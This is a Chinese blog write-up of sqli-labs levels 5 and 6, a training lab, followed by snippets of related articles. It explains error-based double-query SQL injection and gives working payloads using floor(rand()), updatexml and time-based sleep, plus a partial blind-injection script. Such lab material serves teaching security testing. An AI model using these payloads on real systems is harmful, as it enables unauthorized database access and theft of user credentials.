sqli-labs 第5-6关总结

最新推荐文章于 2024-05-22 11:58:15 发布
最新推荐文章于 2024-05-22 11:58:15 发布
阅读量406 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KOne28/article/details/108444383
版权
本文详细介绍了在sqli-labs的第五和第六关中如何利用SQL注入进行攻击。第五关通过报错注入,结合rand()和floor()函数产生随机错误。第六关主要讨论了单引号与双引号的区别及其在注入中的应用。提供了利用extractvalue()和updatexml()函数触发报错的方法。
摘要由CSDN通过智能技术生成

第5关
在这里插入图片描述

输入?id=1
在这里插入图片描述

以前四关的思路
单引号报错,双单引号正常,证明存在注入点
order by 3-- - 正常 order by 4-- - 报错,字段数为3
再用select 1, 2, 3 发现无回显点

所以第五关得用到报错注入

根据标题可以用到双重查询
?id=1’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a-- -

rand() 生成[0,1)的随机数
floor() 向下取整
count(*) 统计
a 别名

大致的原理流程是:
rand()*2将[0,1)的随机数乘2变为[0,2)的随机数,再通过floor()向下取整改为0或1

group by会使数据库建立一个虚拟表并将这些0或1录入,同时将重复的内容归类成了两类,并作为主键, count(*)则对他们进行计数。
在记录数据时,会查询虚拟表中是否存在该主键,若不存在则插入。
因为插入时的结果可能有同样的值,这将导致主键冲突从而引发报错。
因为是随机数,所以导致了有时报错有时正常的情况。

最低0.47元/天 解锁文章
KOne28
关注
sqli-labs系列——第六(双引号二次查询注入)
1匹黑马
05-08 2215
文章目录判断注入开始注入 判断注入 先输一个单引号看看: 、 可以看到这里是采用的双引号闭合,那么我们就在后边让它跟一个双引号报错: 开始注入 第六其实就是一个双引号的二次查询注入,这里就不做过多演示了,原理跟第五一样,都是用了count()、floor()、rand()、group by语句来进行注入的。 这里直接上exp干了: http://192.168.1.113:86/Less-6/?id=1" union SELECT null,count(*),concat((select passw
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1906
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs系列——第六
茶寂的博客
01-15 2369
less6 这个本质上跟第五相同都是使用报错注入,这一使用的是双引号闭合 还是使用updatexml()这个函数 ?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库名: ?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表名: ?id=1" union select updatexml(1,con
sqli-labs靶场第五
gou1791241251的博客
12-20 4592
第五与前面几都有所不同,话不多说,我们传入id=1进去看看吧! 此时页面回显信息为you are in… 第一步:判断注入类型,字符型还是数字型 从报错信息不难看出注入类型为字符型,且为单引号闭合 此步证实了单引号闭合 第二步:判断字段数(使用order by) order by 3时页面正常,order by 4时页面异常,说明有三个字段 页面有布尔类型状态,所以用布尔盲注,页面没有回显不能用联合查询,页面没有报错信息不能用报错注入。 使用length函数来判断数据库名长度是否为1,由图可
sqli-labs-master第六
weixin_33889245的博客
01-19 401
文本文档可以下载: 链接:https://pan.baidu.com/s/1o9c0Hyq 密码:md9w 转载于:https://blog.51cto.com/tdcqvip/2062957
sql双引号二次注入-sqli-labs第6
weixin_46784800的博客
11-03 228
获取database http://sqli/Less-6/?id=1" union select null, count(*), concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a -- - 两次执行即可爆出database 获取表名 http://sqli/Less-6/?id=1" union select null, count(*), concat((select
sqli-labs 六至十
2202_75317918的博客
04-09 968
sqli-labs 六至十
sqli-labs第五sql注入流程
qq_33598708的博客
03-30 5772
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
sqli-labs第十五和十六(post请求-布尔盲注)
qq_42266432的博客
08-26 915
开启第十五,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs-master靶场第二详解
tangtang_888的博客
07-06 1809
1、点击进入sqli-labs-master靶场第二Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
Sqli-labs-master超详细通教程(1-23基础篇)
m0_67391270的博客
06-12 3283
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs-master第五+第六
m_ing
05-10 819
话不多说开始吧! http://192.168.89.131/sqli-labs-master/Less-5/ 看到这个提示信息,一脸懵逼。我也查阅了一些资料可能是:布尔型盲注、报错型注入、时间延迟型盲注了。 到这里时我们需要了解一些sql语句、函数。可以参考这位兄弟的博客 其实有很多种方法我们慢慢道来 第一种方法:时间延迟型手工注入 时间延迟型手工注入,正确会延迟,错误没有延迟。id无所谓,又不看回显,可以通过浏览器的刷新提示观察延迟情况,但是id正确的时候的回显有利于观察。 我们构造sql语句,带上延
基于Sqli-Labs靶场的SQL注入-第6~10
Joker
11-25 2091
本文讲解 updatexml() 函数报错注入、导出文件字符型注入、布尔盲注、时间盲注、中国蚁剑简单使用、一句话木马注入
SQLi-Labs刷题记录】 第五、六思路
gavinmao97的博客
09-01 950
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人的看法,如有不当之处,欢迎各位大佬及时批评指正! */ sqli-labs第五和第六键考察点是一样的,都是卡名称中提及的double injection(双查询注入)。所谓双查询注入可以理解为查询语句的嵌套,这一点在后续的注入过程中会有明显的体现。而两的差异之处在于查询语句的构建方式上,第五是单引号而第六是双引号,这一点在前几中已经经历过,这里算是一个复习吧。下面以第五为例介绍一下注入的过程。(第六
SQLi LABS Less-6 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-26 1万+
sqlilabs 第六sqli-labs less-6,sqlibals less 6
sqli-labs系列——第五
茶寂的博客
01-15 2304
less5 更改id后无果,不能用union联合查询 此处用报错注入 报错注入的概念: (1). 通过floor报错 and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符 (2). 通过updatexml报错 and update
sqli-labs-master第五Less-5 Double Query- Single:方式一
weixin_34365417的博客
11-12 568
由于第三四和第一第二大致相同,我就不写了。 接下来来写第五的第一种方式。 1,目标网站: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 当传递的ID为1的时候提示“you are in” 2,查找注入点: http://127.0.0.1/sqli-labs-master/Le...
sqli-labs---第五
最新发布
2201_75556700的博客
05-22 684
7、查询email_id中的值(这里就拿到了用户email信息)根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入。5、查字段USER中的信息,这里查不出来,那就换一张表。id=1(没有正常显示)提示了一串字符。6、查询emails 这张表中的字段信息。3、查询表名(看到敏感表users)4、查询users表中字段的信息。id=1'(出现了错误提示)
sqli-labs第五
qq_73722777的博客
03-02 711
于是我们尝试使用报错注入的方法对网页进行注入测试,这里我们使用dateupxml()语句进行报错注入。用以下语句进行名字-密码的分开输出,其中floor(rand(0)*2),count(*)为报错语句。此时的一个用户的用户名和密码获取完毕,继续获取第二个用户的数据。尝试对其进行联合搜索,但是输出结果不变,说明不能进行联合搜索。因此我们得知第五应该为数字类型,于是尝试对其查询行数。此时可以发现数据输出不完全,需要分组对数据进行输出。得到结果超出行数,于是重新尝试3行。此时没有报错,说明行显数为3。
sqli-labs第五解法
10-14
sqli-labs第五是一个基于时间的盲注漏洞,需要使用时间延迟来判断SQL语句的执行结果。以下是解题步骤: 1. 在输入框中输入 `' and if(substr(database(),1,1)='s',sleep(5),1)#`,其中 `substr(database(),1,1)` 表示获取数据库名的第一个字符。 2. 如果页面在5秒后有响应,则说明条件成立,即数据库名的第一个字符为 `s`。 3. 依次使用 `substr()` 函数获取数据库名的每个字符,直到获取完整个数据库名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值